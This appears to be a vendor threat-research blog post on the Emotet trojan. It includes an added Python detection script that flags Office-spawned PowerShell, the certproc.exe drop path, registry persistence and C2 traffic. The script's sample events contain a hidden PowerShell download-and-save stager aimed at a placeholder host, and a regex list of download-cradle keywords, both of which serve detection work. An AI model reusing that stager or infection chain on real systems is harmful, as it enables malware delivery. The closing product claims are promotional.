The Cylance Threat Research Group is going head-to-head with a resurgent Emotet. This malware resurfaced in 2017 showcasing new capabilities and targeting sectors beyond the banking industry. Those familiar with the 2014 version will recall Emotet as a banking trojan that harvests data and steals account information.
Watch Cylance go head-to-head with Emotet here:
VIDEO: Our Threat Guidance Team Pits Cylance Against the Emotet Infostealer Malware
Focused primarily on financial institutions in Austria and Germany, early iterations of this malware infected systems via email attachments opened by unsuspecting users. Emotet now has new capabilities added to an already impressive toolkit:
- A new dropper using CreateTimerQueueTimer
- Sandbox awareness
- Anti-analysis capabilities
The Cylance Threat Guidance team analyzed an Emotet attack that began with a Microsoft Word document containing a malicious macro. Opening the file prompts the user to enable macros; once enabled, the macro launches a PowerShell script that downloads and runs a copy of Emotet.
Once running, Emotet (observed in our tests as certproc.exe) copies itself to %AppData%\local\microsoft\windows\certproc.exe and adds a registry entry so that it persists on the host. It then scans the system for PII, credentials, and other sensitive information, and sends what it collects to a command-and-control (C2) server at IP address 188.8.131.52.
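The infection chain above (Word macro, PowerShell stager, certproc.exe in the drop path, registry persistence, traffic to the C2 address) is exactly what a responder hunts for on an endpoint. The script below is an added example written for this page, not Cylance's code, that runs a few triage rules over Sysmon-style process, file, registry and network events. The event dictionaries and their field names are constructed for illustration; the only indicators taken from the page are the drop path and the C2 IP. The Run key used in the sample registry event is an assumed persistence location, not something the page states, which is why the rule keys on the dropped file path rather than on a particular key.

```python
import re

# Indicators taken from the page: the dropped file path and the C2 address.
DROP_SUFFIX = r"\local\microsoft\windows\certproc.exe"
C2_IP = "188.8.131.52"

# Office processes that should not be spawning PowerShell, and download-cradle
# keywords commonly seen in macro-launched stagers (generic, not Emotet-specific).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return re.split(r"[\\/]", path)[-1].lower()


def rule_office_spawned_powershell(ev):
    """Stage 1: an Office process launching PowerShell, worse if it downloads."""
    if ev.get("event") != "ProcessCreate":
        return None
    if basename(ev.get("parent_image", "")) not in OFFICE_PARENTS:
        return None
    if basename(ev.get("image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return None
    if CRADLE.search(ev.get("command_line", "")):
        return "office-spawned PowerShell with download cradle"
    return "office-spawned PowerShell"


def rule_drop_path(ev):
    """certproc.exe created in, or executed from, the path the page reports."""
    if ev.get("event") in ("FileCreate", "ProcessCreate"):
        path = ev.get("target") or ev.get("image") or ""
        if path.lower().endswith(DROP_SUFFIX):
            return "certproc.exe written/launched from the Emotet drop path"
    return None


def rule_registry_persistence(ev):
    """Any registry value whose data points at the dropped binary."""
    if ev.get("event") == "RegistryValueSet":
        if ev.get("details", "").lower().endswith(DROP_SUFFIX):
            return "registry value points at the dropped certproc.exe"
    return None


def rule_c2(ev):
    if ev.get("event") == "NetworkConnect" and ev.get("dest_ip") == C2_IP:
        return "outbound connection to known Emotet C2 " + C2_IP
    return None


RULES = (rule_office_spawned_powershell, rule_drop_path,
         rule_registry_persistence, rule_c2)


def triage(events):
    """Return (event_index, finding) for every event that trips a rule."""
    findings = []
    for i, ev in enumerate(events):
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings.append((i, hit))
    return findings


def looks_like_emotet_chain(events):
    """True only when the macro->PowerShell stage AND at least one
    post-infection artifact (drop path, registry, C2) are both present."""
    hits = {f for _, f in triage(events)}
    stage1 = any("download cradle" in h for h in hits)
    stage2 = any(k in h for h in hits for k in ("drop path", "registry", "C2"))
    return stage1 and stage2


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # Word launches a hidden PowerShell download-and-run stager.
    {"event": "ProcessCreate",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -nop -w hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://example.invalid/a','$env:TEMP\\a.exe')\""},
    # Literal expansion of the page's drop path for a user named 'victim'.
    {"event": "FileCreate",
     "target": r"C:\Users\victim\AppData\Roaming\local\microsoft\windows\certproc.exe"},
    # The Run key here is an assumed persistence location, not from the page.
    {"event": "RegistryValueSet",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\certproc",
     "details": r"C:\Users\victim\AppData\Roaming\local\microsoft\windows\certproc.exe"},
    {"event": "NetworkConnect",
     "image": r"C:\Users\victim\AppData\Roaming\local\microsoft\windows\certproc.exe",
     "dest_ip": "188.8.131.52"},
    # Benign noise: admin PowerShell from Explorer, DNS traffic from svchost.
    {"event": "ProcessCreate",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Process"},
    {"event": "NetworkConnect", "image": r"C:\Windows\System32\svchost.exe",
     "dest_ip": "8.8.8.8"},
]

if __name__ == "__main__":
    for idx, finding in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
    print("Emotet chain present:", looks_like_emotet_chain(SAMPLE_EVENTS))
```

The chain check deliberately requires both the Office-to-PowerShell stage and a post-infection artifact: a lone office-spawned PowerShell is common enough in some environments to be noise, while the drop path and C2 address are specific to the sample described here and will age as the malware changes, so neither half is a confident verdict on its own.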
Cylance Blocks Emotet
Our tests show that CylancePROTECT® script control blocks the malicious macro before it calls the PowerShell script. The re-tooled and resurgent Emotet malware poses new dangers to industries ranging from banking to healthcare – but CylancePROTECT customers have nothing to fear.
Read our Threat Guidance team's 'deep dive' technical write up on Emotet here.